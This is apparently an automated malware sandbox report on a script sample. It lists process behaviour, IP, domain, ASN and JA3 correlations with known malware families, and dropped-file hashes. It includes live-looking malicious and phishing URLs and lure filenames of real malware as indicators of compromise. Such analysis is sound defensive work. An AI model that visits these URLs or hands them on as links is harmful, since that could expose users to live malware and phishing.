                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • VT rate limit hit for: ab.vbs

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        04:38:18API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                        04:38:26API Interceptor85x Sleep call for process: powershell.exe modified
                                                                        04:39:40API Interceptor2x Sleep call for process: svchost.exe modified
                                                                        04:40:02API Interceptor1x Sleep call for process: wmplayer.exe modified

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        162.159.200.1download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                          filezilla-3.17.0.0.0-installer_yr3oq-1.exeGet hashmaliciousUnknownBrowse
                                                                            FileZilla_3.50.0_win64-setup.exeGet hashmaliciousUnknownBrowse
                                                                              FileZilla_3.52.2_win64_sponsored-setup.exeGet hashmaliciousUnknownBrowse
                                                                                FileZilla_3.52.2_win64_sponsored-setup.exeGet hashmaliciousUnknownBrowse
                                                                                  162.159.61.3my2gf4tNEk.exeGet hashmaliciousUnknownBrowse
                                                                                    17333253674c71ac3d5875ca830e11f4630bf65d3b8b7e2686361e216df980d330c80afb30623.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                      sF5nNt8usL.batGet hashmaliciousUnknownBrowse
                                                                                        oLY6JbNl9i.batGet hashmaliciousUnknownBrowse
                                                                                          9aTcxCmLgM.batGet hashmaliciousUnknownBrowse
                                                                                            4l5IFxl9t3.batGet hashmaliciousUnknownBrowse
                                                                                              Readme.lnk.download.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                098aPtSbmd.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                  loader.ps1.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                    Documenti relativi alla violazione dei diritti di propriet#U00e0 intellettuale.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                      194.58.203.20download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                        213.239.239.164download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                          62.149.0.30download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                            wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                                              68.66.226.116Bill Of Lading_MEDUVB935991.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                              • www.myrideguy.net/kgyd/
                                                                                                              AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                              • www.myrideguy.net/kgyd/
                                                                                                              Parfumens.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                              • www.arkgracechurch.com/qgq0/?ehzP8J=UhfgO53CoFS/baI5kBVtB1g8e8T/vciqKxKj6nf60DcK4G69QwsDs9mnRzbZxr8Ky8ZlNqHuRR+isOSUfNtlT6JPmq1blVIczw==&obSf_=6mSb4d
                                                                                                              Afklde.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                              • www.arkgracechurch.com/qgq0/?RiMDw1pV=UhfgO53CoFS/baI5kBVtB1g8e8T/vciqKxKj6nf60DcK4G69QwsDs9mnRzbZxr8Ky8ZlNqHuRR+isOSUfNtlT6JPmq1blVIczw==&Yx5=ef1G-xddsOpF

                                                                                                              Domains

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              time.cloudflare.comdownload.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                              • 162.159.200.1
                                                                                                              gbg1.ntp.netnod.sedownload.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                              • 194.58.203.20
                                                                                                              ntp.nict.jpdownload.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                              • 133.243.238.243
                                                                                                              wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                                              • 61.205.120.130
                                                                                                              chrome.cloudflare-dns.commy2gf4tNEk.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 162.159.61.3
                                                                                                              my2gf4tNEk.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 172.64.41.3
                                                                                                              17333253674c71ac3d5875ca830e11f4630bf65d3b8b7e2686361e216df980d330c80afb30623.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                              • 162.159.61.3
                                                                                                              sF5nNt8usL.batGet hashmaliciousUnknownBrowse
                                                                                                              • 162.159.61.3
                                                                                                              oLY6JbNl9i.batGet hashmaliciousUnknownBrowse
                                                                                                              • 162.159.61.3
                                                                                                              9aTcxCmLgM.batGet hashmaliciousUnknownBrowse
                                                                                                              • 172.64.41.3
                                                                                                              4l5IFxl9t3.batGet hashmaliciousUnknownBrowse
                                                                                                              • 162.159.61.3
                                                                                                              B3N4x4meoJ.batGet hashmaliciousUnknownBrowse
                                                                                                              • 172.64.41.3
                                                                                                              Readme.lnk.download.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                              • 172.64.41.3
                                                                                                              098aPtSbmd.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                              • 162.159.61.3
                                                                                                              ntp.time.in.uadownload.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                              • 62.149.0.30
                                                                                                              wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                                              • 62.149.0.30
                                                                                                              ntp1.hetzner.dedownload.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                              • 213.239.239.164

                                                                                                              ASNs

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              NTP-SEAnycastedNTPservicesfromNetnodIXPsSEdownload.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                              • 194.58.203.20
                                                                                                              regscs.exeGet hashmaliciousWebMonitor RATBrowse
                                                                                                              • 194.58.200.20
                                                                                                              PREVIOUS CONVERSATION.pdf.exeGet hashmaliciousWebMonitor RATBrowse
                                                                                                              • 194.58.200.20
                                                                                                              OUTSTANDING_DEBTS.exeGet hashmaliciousWebMonitor RATBrowse
                                                                                                              • 194.58.200.20
                                                                                                              NEW PURCHASE ORDER.exeGet hashmaliciousWebMonitor RATBrowse
                                                                                                              • 194.58.200.20
                                                                                                              STATEMENT OF ACCOUNT.exeGet hashmaliciousWebMonitor RATBrowse
                                                                                                              • 194.58.200.20
                                                                                                              Banking_cordinates_928273.exeGet hashmaliciousWebMonitor RATBrowse
                                                                                                              • 194.58.200.20
                                                                                                              REQUEST FOR QUOTATION.exeGet hashmaliciousWebMonitor RATBrowse
                                                                                                              • 194.58.200.20
                                                                                                              allcrhfJER.exeGet hashmaliciousWebMonitor RATBrowse
                                                                                                              • 194.58.200.20
                                                                                                              HSBC_PAYMENT_COPY.pdf.exeGet hashmaliciousWebMonitor RATBrowse
                                                                                                              • 194.58.200.20
                                                                                                              CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                              • 172.67.165.166
                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                              • 104.21.16.9
                                                                                                              https://click.pstmrk.it/3s/bmxn8t84vg.gherapilta.shop%2F/ySDk/28y5AQ/AQ/e82f1f59-f734-42be-affb-895d81855fb4/1/pD2JDTOBnbGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                                              • 104.26.13.205
                                                                                                              UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 172.67.156.195
                                                                                                              REQUEST FOR QUOATION AND PRICES 0106-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 104.21.67.152
                                                                                                              RFQ.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                              • 104.26.12.205
                                                                                                              BACS190027-01.pdfGet hashmaliciousUnknownBrowse
                                                                                                              • 172.66.42.208
                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                              • 104.21.16.9
                                                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                                              • 172.67.181.44
                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                              • 104.21.16.9
                                                                                                              HETZNER-ASDEmg.vbsGet hashmaliciousUnknownBrowse
                                                                                                              • 148.251.114.233
                                                                                                              mj.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 148.251.114.233
                                                                                                              ap.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 148.251.114.233
                                                                                                              cu.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 148.251.114.233
                                                                                                              Scripts_Obfusque.vbsGet hashmaliciousUnknownBrowse
                                                                                                              • 148.251.114.233
                                                                                                              ni.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 148.251.114.233
                                                                                                              UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 88.99.61.52
                                                                                                              https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aTBg62vcUAgkYbCAf46MpAyc7W7GFqvL6adNxNCTlmXTIiiRHR0fGeBxBsxNA5VbYoJQJb-2FJYi0QkLgjAoVYrRvTi1dn7pPo7PbeQWMcs70s7UFE7WeCgk9rDpKP4binyuu0CEbckceaS6ycGVUXPi2325g7v8hitus3ay9MICEoPWHxYePXARIxPiq-2FS9xmhqxVG-2BsRc9-2BU2VqX-2BZB9nYYuSKeNDIvkVaXKl7x-2FFSxF7xXa4BaT30eg9SUGZbRvZ8-3D#CGet hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                                                                              • 5.9.227.67
                                                                                                              Ttok18.exeGet hashmaliciousVidarBrowse
                                                                                                              • 159.69.102.165
                                                                                                              jtkhikadjthsad.exeGet hashmaliciousVidarBrowse
                                                                                                              • 159.69.102.165

                                                                                                              JA3 Fingerprints

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              3b5074b1b5d032e5620f69f9f700ff0emg.vbsGet hashmaliciousUnknownBrowse
                                                                                                              • 68.66.226.116
                                                                                                              mj.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 68.66.226.116
                                                                                                              ap.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 68.66.226.116
                                                                                                              cu.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 68.66.226.116
                                                                                                              Scripts_Obfusque.vbsGet hashmaliciousUnknownBrowse
                                                                                                              • 68.66.226.116
                                                                                                              ni.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 68.66.226.116
                                                                                                              REQUEST FOR QUOATION AND PRICES 0106-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 68.66.226.116
                                                                                                              RFQ.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                              • 68.66.226.116
                                                                                                              31#U544a.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                              • 68.66.226.116
                                                                                                              R7bv9d6gTH.dllGet hashmaliciousUnknownBrowse
                                                                                                              • 68.66.226.116
                                                                                                              37f463bf4616ecd445d4a1937da06e19REQUEST FOR QUOATION AND PRICES 0106-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 202.71.109.228
                                                                                                              comp#U00e1rtilhar080425-000800-66000544000.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 202.71.109.228
                                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 202.71.109.228
                                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 202.71.109.228
                                                                                                              comp#U00e1rtilhar080425-000800-66000544000.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 202.71.109.228
                                                                                                              venomderek.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                              • 202.71.109.228
                                                                                                              Ttok18.exeGet hashmaliciousVidarBrowse
                                                                                                              • 202.71.109.228
                                                                                                              jtkhikadjthsad.exeGet hashmaliciousVidarBrowse
                                                                                                              • 202.71.109.228
                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                              • 202.71.109.228
                                                                                                              caec7ddf6889590d999d7ca1b76373b6download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                              • 45.149.241.141
                                                                                                              wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                                              • 45.149.241.141
                                                                                                              0a0#U00a0.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                              • 45.149.241.141
                                                                                                              UGcjMkPWwW.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                              • 45.149.241.141
                                                                                                              XAhzDHAVZ2.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                              • 45.149.241.141
                                                                                                              TctqdRX5Wq.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                              • 45.149.241.141
                                                                                                              g753nr4GI9.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                              • 45.149.241.141
                                                                                                              msvcp110.dllGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                              • 45.149.241.141
                                                                                                              qsKo.ps1Get hashmaliciousRHADAMANTHYSBrowse
                                                                                                              • 45.149.241.141
                                                                                                              DCF368HPtv.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                              • 45.149.241.141

                                                                                                              Dropped Files

                                                                                                              No context

                                                                                                              Created / dropped Files

                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1310720
                                                                                                              Entropy (8bit):0.7067110937542161
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6VqB:2JIB/wUKUKQncEmYRTwh09
                                                                                                              MD5:568E13B71AADAE3607D23C035B3A2BFB
                                                                                                              SHA1:8EBD71CF9FEC5AEA904A9DB0CA29B8AFC1B382B0
                                                                                                              SHA-256:28C9F81D20133857BFB930BBA965F52EF08CF24C3849D8D92A62362561AE52E9
                                                                                                              SHA-512:06423E8C7C613122C63CF67BD048BA9DE52DD6E0F6E62960163877489E06F20CD8F7676242BA5D1B99AEBBD5A38FAF634F444B7CB47D8FAD93434757F60BA670
                                                                                                              Malicious:false
                                                                                                              Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x629d91e6, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1310720
                                                                                                              Entropy (8bit):0.7900431498401911
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:rSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:razaPvgurTd42UgSii
                                                                                                              MD5:05C472A5A5A52996D610519C9844BAB1
                                                                                                              SHA1:BB085C9980E6A8008D07C51A99D95E3EE8A1FF97
                                                                                                              SHA-256:CB57ECC7B9B76CDE828E92B30FD7BBE0BBA09D2194116F21932E75A360ABE625
                                                                                                              SHA-512:95049ADCB8740B123CC7C5EF96C0DC4EE503CC1DD20A0B2C39C275954D8082685100BB2E7EE82EA79C4A2FCC515143853D1EE38C4300F0B6F1B6C7DCDF2EFD3C
                                                                                                              Malicious:false
                                                                                                              Preview:b...... ...............X\...;...{......................0.`.....42...{5.('...|..h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{.....................................7('...|......................('...|...........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):16384
                                                                                                              Entropy (8bit):0.08217889886404028
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:s2KYe63yqt/57Dek3JfPB+YllEqW3l/TjzzQ/t:s2KzcrR3tHEImd8/
                                                                                                              MD5:004AB72E4181135EF748BE2015A0DCB8
                                                                                                              SHA1:7347A9A6E353C641C095F987FBFF8D3B1ABC8207
                                                                                                              SHA-256:A4B12345FA1F4F07E1A000D9BE18731D5D0C3843E6620AA414DA5B4DC4303121
                                                                                                              SHA-512:181BB3F2C737D58694B76B2FD147C4E134055E90EC35B53CA9D5D4012AA2E507090020E5C52BC3337387170FA535BF202FA8697B45F491F94B474D639921F278
                                                                                                              Malicious:false
                                                                                                              Preview:........................................;...{..('...|..42...{5.........42...{5.42...{5...Y.42...{59....................('...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user~1\AppData\Local\Temp\chrBB3.tmp\Default\Code Cache\js\index-dir\the-real-index (copy)

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):48
                                                                                                              Entropy (8bit):2.9972243200613975
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:7JCWFjEtv5:QWqtx
                                                                                                              MD5:3C9BBBD67DCC0AEE4460DE770F446AE3
                                                                                                              SHA1:48163C6722C05289B6DB5F9AA6E67F60D87231A9
                                                                                                              SHA-256:324BA9E7CE493BE9DF1FD25CAD6089AD2B1F8F1BE0D0BB89CD7DB36ACE95E215
                                                                                                              SHA-512:653DAE8844CE47FBFC847928FD9C68680F54CC3F1A3FBC43BD57813EB1610036EEF89690E1641344B967BB93F4B3DB3128FD15B4B404DCC0E1FAD292847521AF
                                                                                                              Malicious:false
                                                                                                              Preview:(...f,'.oy retne........................1c..../.

                                                                                                              C:\Users\user~1\AppData\Local\Temp\chrBB3.tmp\Default\Code Cache\wasm\index-dir\the-real-index (copy)

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):48
                                                                                                              Entropy (8bit):2.9972243200613975
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:AiHC0EN34TA+:AiHqNIk+
                                                                                                              MD5:CD1F8B165B153D99C15F45C7C96D4970
                                                                                                              SHA1:B02ABBA0F5FF15BD54A07D9A464AFFF9B5EF6CCF
                                                                                                              SHA-256:A0EE4A6691F50434FE83D0CD38C2E1397B133D6065A1A4A38705D14588D91FBA
                                                                                                              SHA-512:9AC4FC96D408E0545AB5A5D6A32E7BCCD197A41A754154F4C1C774D2D66A498890FA1F7713D2D1029927E5566E2ADE9EC96EB883267ED9C721E37BCA7FF1F7FA
                                                                                                              Malicious:false
                                                                                                              Preview:(...].X.oy retne............................../.

                                                                                                              C:\Users\user~1\AppData\Local\Temp\chrBB3.tmp\Default\EdgeCoupons\coupons_data.db\CURRENT (copy)

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):16
                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                              Malicious:false
                                                                                                              Preview:MANIFEST-000001.

                                                                                                              C:\Users\user~1\AppData\Local\Temp\chrBB3.tmp\Default\Extension Rules\CURRENT (copy)

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):16
                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                              Malicious:false
                                                                                                              Preview:MANIFEST-000001.

                                                                                                              C:\Users\user~1\AppData\Local\Temp\chrBB3.tmp\Default\Extension Scripts\CURRENT (copy)

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):16
                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                              Malicious:false
                                                                                                              Preview:MANIFEST-000001.

                                                                                                              C:\Users\user~1\AppData\Local\Temp\chrBB3.tmp\Default\Local Storage\leveldb\CURRENT (copy)

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):16
                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                              Malicious:false
                                                                                                              Preview:MANIFEST-000001.

                                                                                                              C:\Users\user~1\AppData\Local\Temp\chrBB3.tmp\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:JSON data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2
                                                                                                              Entropy (8bit):1.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:H:H
                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                              Malicious:false
                                                                                                              Preview:[]

                                                                                                              C:\Users\user~1\AppData\Local\Temp\chrBB3.tmp\Default\Session Storage\CURRENT (copy)

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):16
                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                              Malicious:false
                                                                                                              Preview:MANIFEST-000001.

                                                                                                              C:\Users\user~1\AppData\Local\Temp\chrBB3.tmp\Default\Site Characteristics Database\CURRENT (copy)

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):16
                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                              Malicious:false
                                                                                                              Preview:MANIFEST-000001.

                                                                                                              C:\Users\user~1\AppData\Local\Temp\chrBB3.tmp\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir\the-real-index (copy)

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):48
                                                                                                              Entropy (8bit):2.9972243200613975
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Z1Tp0ESVBxi+:H1mi+
                                                                                                              MD5:8E964E0FC3A8B457ADF8FAF063881CF5
                                                                                                              SHA1:4CF9F19CF75C1912D1CB32A4880511CC4613832B
                                                                                                              SHA-256:B7ECC747C60F2CE4527A67DB29AB9C206214C75868155D447CAB3CB6C2E3049A
                                                                                                              SHA-512:860598125CADC2683D54839ADCFD452701B3225F5FAE7E205A7D270B9DF4221FAA0A2C946BA84712E33B44E6939BD04CEEC4E25279B6B85389139EE2B90FA01B
                                                                                                              Malicious:false
                                                                                                              Preview:(...D.9@oy retne..........................$.../.

                                                                                                              C:\Users\user~1\AppData\Local\Temp\chrBB3.tmp\Default\Sync Data\LevelDB\CURRENT (copy)

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):16
                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                              Malicious:false
                                                                                                              Preview:MANIFEST-000001.

                                                                                                              C:\Users\user~1\AppData\Local\Temp\chrBB3.tmp\Default\shared_proto_db\CURRENT (copy)

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):16
                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
